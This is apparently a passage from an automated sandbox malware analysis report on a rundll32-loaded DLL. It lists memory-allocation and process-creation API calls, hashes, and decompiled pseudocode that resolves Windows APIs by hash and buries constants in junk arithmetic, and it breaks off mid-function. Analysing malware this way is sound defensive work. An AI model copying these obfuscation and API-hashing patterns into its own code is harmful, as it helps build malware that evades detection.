                                                                                                                                  control_flow_graph 220 10001b80-10001b90 221 10001b92-10001b97 220->221 222 10001b9c-10001ba8 220->222 223 10001c9c-10001c9f 221->223 224 10001c04-10001c66 222->224 225 10001baa-10001bb5 222->225 228 10001c74-10001c91 VirtualProtect 224->228 229 10001c68-10001c71 224->229 226 10001bb7-10001bbe 225->226 227 10001bfa-10001bff 225->227 230 10001bc0-10001bce 226->230 231 10001be2-10001bf4 VirtualFree 226->231 227->223 232 10001c93-10001c95 228->232 233 10001c97 228->233 229->228 230->231 234 10001bd0-10001be0 230->234 231->227 232->223 233->223 234->227 234->231
                                                                                                                                  APIs
                                                                                                                                  • VirtualFree.KERNELBASE(00000000,?,00004000,?,10001E18,00000001,00000000,?,100025E8,?,?,?,?,100025E8,00000000,00000000), ref: 10001BF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1263568516-0
                                                                                                                                  • Opcode ID: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                  • Instruction ID: 749d9464b473a0839557e7d3f54d457581c14e70089049c47b2cfbba366a5d19
                                                                                                                                  • Opcode Fuzzy Hash: dd38d51ca3a6b672f32aeaf0fb246c4496e8ccb210392943b19121075d5be09d
                                                                                                                                  • Instruction Fuzzy Hash: 5841B9746002099FEB48CF58C490FA9B7B2FB88350F14C659E81A9F395D731EE41CB84
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  control_flow_graph 235 10036624-10036642 HeapCreate 236 10036647-10036654 call 100365c9 235->236 237 10036644-10036646 235->237 240 10036656-10036663 call 10035aca 236->240 241 1003667a-1003667d 236->241 240->241 244 10036665-10036678 HeapDestroy 240->244 244->237
                                                                                                                                  APIs
                                                                                                                                  • HeapCreate.KERNELBASE(00000000,00001000,00000000,10030AEB,00000001,?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C), ref: 10036635
                                                                                                                                  • HeapDestroy.KERNEL32(?,?,00000001,?,?,10030C69,00000001,?,?,10050A28,0000000C,10030D23,?), ref: 1003666B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CreateDestroy
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3296620671-0
                                                                                                                                  • Opcode ID: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction ID: 5adf962be877c1470e25a5b203e63be93066c2f5666ac54c72bc9e0dfe65a95a
                                                                                                                                  • Opcode Fuzzy Hash: d3c419273cfe47b5decc93e2e70dd510a49122bb40b3ad2795d27682d43cbdf9
                                                                                                                                  • Instruction Fuzzy Hash: 22E06D706103519EFB139B30CE8A33539F8FB5878BF008869F405C80A0FBA08840AA15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 245 100019c0-100019ee 246 10001a02-10001a0e 245->246 247 10001a14-10001a1b 246->247 248 10001b06 246->248 249 10001a83-10001a9e call 10001990 247->249 250 10001a1d-10001a2a 247->250 251 10001b0b-10001b0e 248->251 259 10001aa0-10001aa2 249->259 260 10001aa4-10001ac9 VirtualAlloc 249->260 253 10001a2c-10001a4e VirtualAlloc 250->253 254 10001a7e 250->254 257 10001a50-10001a52 253->257 258 10001a57-10001a7b call 100017c0 253->258 254->246 257->251 258->254 259->251 262 10001acb-10001acd 260->262 263 10001acf-10001afe call 10001810 260->263 262->251 263->248
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(4D8B0000,00000000,00001000,00000004,?,1000257F,00000000), ref: 10001A41
                                                                                                                                  • VirtualAlloc.KERNELBASE(4D8B0000,8B118BBC,00001000,00000004,10012839,8B118BBC,?,1000257F,00000000,10012839,?), ref: 10001ABC
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451308466.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451301474.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451436749.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451468877.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451479095.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451519072.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4275171209-0
                                                                                                                                  • Opcode ID: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                  • Instruction ID: bcee95509f27266f5ca249dd7f6d6a0ca5035efccc592cd1fda7edfbe35d51d4
                                                                                                                                  • Opcode Fuzzy Hash: 095274eb58cefc7da223eb8c3e93af1acb0495bf3fbc764276b25f8f0a8074d8
                                                                                                                                  • Instruction Fuzzy Hash: 0D51D9B4A0010AEFDB04CF94C991AAEB7F5FF48344F248599E905AB345D770EE91CBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 275 2d7f5d-2d7ff1 call 2e20b9 call 2eaa30 CreateProcessW
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,002DAD99,?,?,?,181C8C04,002DAD99), ref: 002D7FEB
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 963392458-0
                                                                                                                                  • Opcode ID: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction ID: 8e7c4d04f71e9467acc981f8eaf821a22fdc7b680c0d641cc8fff065169fa155
                                                                                                                                  • Opcode Fuzzy Hash: f75a7139c89005ad41842e885698baffe79ed174033219a517191554fa823b18
                                                                                                                                  • Instruction Fuzzy Hash: C411D372402128BBDF619F91DD09CEF7F79FF093A4F549144FA1921121D2729A60EBA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 280 2e46bb-2e473b call 2e20b9 call 2eaa30 SHGetFolderPathW
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E002E46BB(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				intOrPtr _v16;
                                                                                                                                  				intOrPtr _v20;
                                                                                                                                  				void* _t21;
                                                                                                                                  				intOrPtr* _t25;
                                                                                                                                  				void* _t26;
                                                                                                                                  
                                                                                                                                  				E002E20B9(_t21);
                                                                                                                                  				_v20 = 0x3f5bb0;
                                                                                                                                  				_v16 = 0;
                                                                                                                                  				_v12 = 0x996874;
                                                                                                                                  				_v12 = _v12 << 0xf;
                                                                                                                                  				_v12 = _v12 ^ 0xb43bad9d;
                                                                                                                                  				_v8 = 0xebf0af;
                                                                                                                                  				_v8 = _v8 ^ 0x3b7dcb24;
                                                                                                                                  				_v8 = _v8 ^ 0x3b96d1fd;
                                                                                                                                  				_t25 = E002EAA30(0x220, 0xdf0d4f1a, __ecx, 0x54d725f);
                                                                                                                                  				_t26 =  *_t25(0, _a24, 0, 0, _a4, __ecx, __edx, _a4, 0, 0, 0, _a20, _a24, _a28); // executed
                                                                                                                                  				return _t26;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                  • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,B43BAD9D), ref: 002E4735
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FolderPath
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1514166925-0
                                                                                                                                  • Opcode ID: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction ID: 623926b1ad967718e9b7b99544d0ccb191d07455a4043418726378b991a5eeae
                                                                                                                                  • Opcode Fuzzy Hash: 618a3ba0faaefa928059a11cdf791cf9449ddf75a1a0986f9704d06953ed0748
                                                                                                                                  • Instruction Fuzzy Hash: CD012C75801218BBCF15AFD6DC098DFBFB8EF45394F108145F91826211D2758A60DBD1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 285 2d93ed-2d9461 call 2eaa30 ExitProcess
                                                                                                                                  C-Code - Quality: 73%
                                                                                                                                  			E002D93ED() {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _v24;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				intOrPtr _t24;
                                                                                                                                  
                                                                                                                                  				_v28 = 0xda6c64;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				_v12 = 0x88a564;
                                                                                                                                  				_v12 = _v12 | 0x9bf5ed5c;
                                                                                                                                  				_v12 = _v12 ^ 0x9bf17c37;
                                                                                                                                  				_v8 = 0xd9241f;
                                                                                                                                  				_v8 = _v8 * 0x5c;
                                                                                                                                  				_v8 = _v8 + 0xccdd;
                                                                                                                                  				_v8 = _v8 + 0x903;
                                                                                                                                  				_v8 = _v8 ^ 0x4e0c4bb2;
                                                                                                                                  				E002EAA30(0x1d2, 0x9df7cc0d, _t24, 0x98a8878d);
                                                                                                                                  				ExitProcess(0);
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • ExitProcess.KERNELBASE(00000000), ref: 002D945B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                  • Opcode ID: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction ID: 20c346877a2b26e0dc8f8b5b4c2d4a6609497b1a866c8d3820a2d006b7e56a39
                                                                                                                                  • Opcode Fuzzy Hash: d0c754f3adca9a80957f35e1c78ce5c07ecf17b0c35f9d329434f55f6d35f6b1
                                                                                                                                  • Instruction Fuzzy Hash: 87F03C71901308FBEB04DBE8DA4699DFBB4EB50314F2081A9D604B3261E7705F459A91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 305 2db23c-2db2c6 call 2e20b9 call 2eaa30 lstrcmpiW
                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                  			E002DB23C(intOrPtr __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				void* _t27;
                                                                                                                                  				int _t32;
                                                                                                                                  
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t27);
                                                                                                                                  				_v12 = 0x6268;
                                                                                                                                  				_v12 = _v12 ^ 0x57e834c3;
                                                                                                                                  				_v12 = _v12 + 0xffff2919;
                                                                                                                                  				_v12 = _v12 + 0xffff3e3d;
                                                                                                                                  				_v12 = _v12 ^ 0x57e9dc2b;
                                                                                                                                  				_v8 = 0xa46433;
                                                                                                                                  				_v8 = _v8 + 0x98ba;
                                                                                                                                  				_v8 = _v8 | 0xc390ebe9;
                                                                                                                                  				_v8 = _v8 + 0xd5b0;
                                                                                                                                  				_v8 = _v8 ^ 0xc3bab866;
                                                                                                                                  				E002EAA30(0xb5, 0x9df7cc0d, __ecx, 0xaca78213);
                                                                                                                                  				_t32 = lstrcmpiW(_a16, _a4); // executed
                                                                                                                                  				return _t32;
                                                                                                                                  			}

                                                                                                                                  APIs
                                                                                                                                  • lstrcmpiW.KERNELBASE(EE1E6DE5,57E9DC2B), ref: 002DB2C1
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcmpi
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1586166983-0
                                                                                                                                  • Opcode ID: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction ID: fb7ca3f518f3bc58fef050a16d8e156f6a8c912c1f73686c6f9e2e51d9787662
                                                                                                                                  • Opcode Fuzzy Hash: 26884a22f0da7bc497ec3f8ef604453e7fb46fa0b929fe200322ee9dcdc91410
                                                                                                                                  • Instruction Fuzzy Hash: 270116B2C04748FFDF45DFD4DD468AEBBB5EB44304F208188B90566262E3728F64AB61
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                  			E002EE395(signed int __ecx, signed int* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, signed int _a44) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				signed int* _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				signed int _v172;
                                                                                                                                  				signed int _v176;
                                                                                                                                  				signed int _v180;
                                                                                                                                  				signed int _v184;
                                                                                                                                  				signed int _v188;
                                                                                                                                  				signed int _v192;
                                                                                                                                  				signed int _v196;
                                                                                                                                  				signed int _v200;
                                                                                                                                  				signed int _v204;
                                                                                                                                  				signed int _v208;
                                                                                                                                  				signed int _v212;
                                                                                                                                  				signed int _v216;
                                                                                                                                  				signed int _v220;
                                                                                                                                  				signed int _v224;
                                                                                                                                  				signed int _v228;
                                                                                                                                  				signed int _v232;
                                                                                                                                  				signed int _v236;
                                                                                                                                  				signed int _v240;
                                                                                                                                  				signed int _v244;
                                                                                                                                  				signed int _v248;
                                                                                                                                  				signed int _v252;
                                                                                                                                  				signed int _v256;
                                                                                                                                  				signed int _v260;
                                                                                                                                  				signed int _v264;
                                                                                                                                  				signed int _v268;
                                                                                                                                  				signed int _v272;
                                                                                                                                  				intOrPtr _v276;
                                                                                                                                  				signed int _v280;
                                                                                                                                  				signed int _v284;
                                                                                                                                  				signed int _v288;
                                                                                                                                  				signed int _t823;
                                                                                                                                  				void* _t829;
                                                                                                                                  				signed int* _t832;
                                                                                                                                  				signed int _t833;
                                                                                                                                  				signed int _t845;
                                                                                                                                  				signed int _t858;
                                                                                                                                  				signed int _t862;
                                                                                                                                  				intOrPtr _t868;
                                                                                                                                  				signed int _t888;
                                                                                                                                  				void* _t939;
                                                                                                                                  				void* _t948;
                                                                                                                                  				signed int _t956;
                                                                                                                                  				signed int _t957;
                                                                                                                                  				signed int _t958;
                                                                                                                                  				signed int _t959;
                                                                                                                                  				signed int _t960;
                                                                                                                                  				signed int _t961;
                                                                                                                                  				signed int _t962;
                                                                                                                                  				signed int _t963;
                                                                                                                                  				signed int _t964;
                                                                                                                                  				signed int _t965;
                                                                                                                                  				signed int _t966;
                                                                                                                                  				signed int _t967;
                                                                                                                                  				signed int _t968;
                                                                                                                                  				signed int _t969;
                                                                                                                                  				signed int _t970;
                                                                                                                                  				signed int _t971;
                                                                                                                                  				signed int _t972;
                                                                                                                                  				signed int _t973;
                                                                                                                                  				signed int _t974;
                                                                                                                                  				signed int _t975;
                                                                                                                                  				signed int _t976;
                                                                                                                                  				signed int _t977;
                                                                                                                                  				signed int _t981;
                                                                                                                                  				signed int _t984;
                                                                                                                                  				signed int _t985;
                                                                                                                                  				signed int* _t988;
                                                                                                                                  				void* _t991;
                                                                                                                                  
                                                                                                                                  				_push(_a44);
                                                                                                                                  				_v4 = __ecx;
                                                                                                                                  				_push(_a40);
                                                                                                                                  				_v8 = __edx;
                                                                                                                                  				_push(_a36);
                                                                                                                                  				_push(_a32);
                                                                                                                                  				_push(_a28);
                                                                                                                                  				_push(_a24);
                                                                                                                                  				_push(_a20);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx & 0x0000ffff);
                                                                                                                                  				E002E20B9(__ecx & 0x0000ffff);
                                                                                                                                  				_v284 = 0x99c43c;
                                                                                                                                  				_t988 =  &(( &_v288)[0xd]);
                                                                                                                                  				_v284 = _v284 + 0xbb14;
                                                                                                                                  				_v284 = _v284 >> 0xb;
                                                                                                                                  				_v284 = _v284 ^ 0x0000134f;
                                                                                                                                  				_t862 = 0;
                                                                                                                                  				_v120 = 0x27310;
                                                                                                                                  				_t977 = 0x329d839;
                                                                                                                                  				_t956 = 0x43;
                                                                                                                                  				_v120 = _v120 / _t956;
                                                                                                                                  				_v120 = _v120 + 0xe2f5;
                                                                                                                                  				_v120 = _v120 ^ 0x0000ec43;
                                                                                                                                  				_v36 = 0x50046c;
                                                                                                                                  				_v36 = _v36 << 1;
                                                                                                                                  				_v36 = _v36 ^ 0x00a00810;
                                                                                                                                  				_v116 = 0x7f268a;
                                                                                                                                  				_v116 = _v116 ^ 0x5f915552;
                                                                                                                                  				_t957 = 0x1b;
                                                                                                                                  				_v276 = 0;
                                                                                                                                  				_v116 = _v116 * 0x3e;
                                                                                                                                  				_v116 = _v116 ^ 0x3bc08e50;
                                                                                                                                  				_v228 = 0xb299e8;
                                                                                                                                  				_v228 = _v228 >> 0xe;
                                                                                                                                  				_v228 = _v228 << 0x10;
                                                                                                                                  				_v228 = _v228 * 0x42;
                                                                                                                                  				_v228 = _v228 ^ 0xb8144000;
                                                                                                                                  				_v64 = 0x620921;
                                                                                                                                  				_v64 = _v64 | 0xbe88b167;
                                                                                                                                  				_v64 = _v64 ^ 0xbeaab967;
                                                                                                                                  				_v172 = 0xae09b0;
                                                                                                                                  				_v172 = _v172 | 0xde677f7d;
                                                                                                                                  				_v172 = _v172 ^ 0xc5d04777;
                                                                                                                                  				_v172 = _v172 ^ 0x1b3b388a;
                                                                                                                                  				_v132 = 0xc06abb;
                                                                                                                                  				_v132 = _v132 ^ 0x2b7b17d1;
                                                                                                                                  				_v132 = _v132 / _t957;
                                                                                                                                  				_v132 = _v132 ^ 0x059ea5d4;
                                                                                                                                  				_v236 = 0x9fdac6;
                                                                                                                                  				_v236 = _v236 >> 4;
                                                                                                                                  				_v236 = _v236 + 0x9b65;
                                                                                                                                  				_v236 = _v236 * 0x7b;
                                                                                                                                  				_v236 = _v236 ^ 0x051f8b2b;
                                                                                                                                  				_v108 = 0xc74878;
                                                                                                                                  				_v108 = _v108 + 0x314b;
                                                                                                                                  				_v108 = _v108 * 0x41;
                                                                                                                                  				_v108 = _v108 ^ 0x32a5e883;
                                                                                                                                  				_v196 = 0x1587ec;
                                                                                                                                  				_v196 = _v196 ^ 0x07496474;
                                                                                                                                  				_v196 = _v196 >> 7;
                                                                                                                                  				_t958 = 0x2c;
                                                                                                                                  				_v196 = _v196 / _t958;
                                                                                                                                  				_v196 = _v196 ^ 0x000054ad;
                                                                                                                                  				_v244 = 0xbebf62;
                                                                                                                                  				_v244 = _v244 << 0xb;
                                                                                                                                  				_v244 = _v244 + 0xffffca16;
                                                                                                                                  				_v244 = _v244 << 0xe;
                                                                                                                                  				_v244 = _v244 ^ 0x36858000;
                                                                                                                                  				_v72 = 0x750de5;
                                                                                                                                  				_v72 = _v72 | 0xb336b270;
                                                                                                                                  				_v72 = _v72 ^ 0xb377bff5;
                                                                                                                                  				_v256 = 0xc175fb;
                                                                                                                                  				_t984 = 0x72;
                                                                                                                                  				_t959 = 0x28;
                                                                                                                                  				_v256 = _v256 * 0x26;
                                                                                                                                  				_v256 = _v256 >> 5;
                                                                                                                                  				_v256 = _v256 ^ 0xfb5a89da;
                                                                                                                                  				_v256 = _v256 ^ 0xfbbf3581;
                                                                                                                                  				_v76 = 0x1a7820;
                                                                                                                                  				_v76 = _v76 | 0xb8d3f172;
                                                                                                                                  				_v76 = _v76 ^ 0xb8dbf96d;
                                                                                                                                  				_v224 = 0x97ff87;
                                                                                                                                  				_v224 = _v224 / _t984;
                                                                                                                                  				_v224 = _v224 >> 6;
                                                                                                                                  				_v224 = _v224 * 0x5d;
                                                                                                                                  				_v224 = _v224 ^ 0x0001effe;
                                                                                                                                  				_v40 = 0x7c0450;
                                                                                                                                  				_v40 = _v40 / _t959;
                                                                                                                                  				_v40 = _v40 ^ 0x000319b6;
                                                                                                                                  				_v136 = 0x260fad;
                                                                                                                                  				_v136 = _v136 + 0x622a;
                                                                                                                                  				_t960 = 0x1c;
                                                                                                                                  				_v136 = _v136 / _t960;
                                                                                                                                  				_v136 = _v136 ^ 0x00015e7e;
                                                                                                                                  				_v288 = 0x61f743;
                                                                                                                                  				_t961 = 0x66;
                                                                                                                                  				_v288 = _v288 * 0x25;
                                                                                                                                  				_v288 = _v288 ^ 0x0e2ee817;
                                                                                                                                  				_v288 = 0x858eca;
                                                                                                                                  				_v288 = _v288 / _t984;
                                                                                                                                  				_v288 = _v288 ^ 0x0002de1a;
                                                                                                                                  				_v280 = 0xcba1b8;
                                                                                                                                  				_v280 = _v280 / _t961;
                                                                                                                                  				_v280 = _v280 ^ 0xc2211053;
                                                                                                                                  				_v280 = _v280 + 0xffff75b7;
                                                                                                                                  				_v280 = _v280 ^ 0xc2279606;
                                                                                                                                  				_v288 = 0x614b46;
                                                                                                                                  				_v288 = _v288 >> 4;
                                                                                                                                  				_v288 = _v288 ^ 0x000cf9c3;
                                                                                                                                  				_v288 = 0x794624;
                                                                                                                                  				_v288 = _v288 + 0xb4d0;
                                                                                                                                  				_v288 = _v288 ^ 0x0072cd5b;
                                                                                                                                  				_v288 = 0xcdbe83;
                                                                                                                                  				_v288 = _v288 >> 0xf;
                                                                                                                                  				_v288 = _v288 ^ 0x00034ad6;
                                                                                                                                  				_v288 = 0x24639d;
                                                                                                                                  				_t962 = 0x28;
                                                                                                                                  				_v288 = _v288 / _t962;
                                                                                                                                  				_v288 = _v288 ^ 0x000e4507;
                                                                                                                                  				_v288 = 0x4730ec;
                                                                                                                                  				_t963 = 0x21;
                                                                                                                                  				_v288 = _v288 / _t963;
                                                                                                                                  				_v288 = _v288 ^ 0x0002fb4b;
                                                                                                                                  				_v284 = 0xb301d9;
                                                                                                                                  				_t964 = 0x4e;
                                                                                                                                  				_v284 = _v284 / _t964;
                                                                                                                                  				_v284 = _v284 + 0x8c1d;
                                                                                                                                  				_v284 = _v284 ^ 0x00061f34;
                                                                                                                                  				_v280 = 0xfdcbf7;
                                                                                                                                  				_v280 = _v280 + 0x27a;
                                                                                                                                  				_v280 = _v280 + 0xffff891b;
                                                                                                                                  				_t965 = 0x46;
                                                                                                                                  				_v280 = _v280 / _t965;
                                                                                                                                  				_v280 = _v280 ^ 0x0008575c;
                                                                                                                                  				_v284 = 0xc1d3a0;
                                                                                                                                  				_v284 = _v284 >> 0xc;
                                                                                                                                  				_v284 = _v284 << 2;
                                                                                                                                  				_v284 = _v284 ^ 0x000b0f76;
                                                                                                                                  				_v112 = 0xeee25;
                                                                                                                                  				_v112 = _v112 << 0xc;
                                                                                                                                  				_v112 = _v112 << 4;
                                                                                                                                  				_v112 = _v112 ^ 0xee2c14e7;
                                                                                                                                  				_v180 = 0x8a49b3;
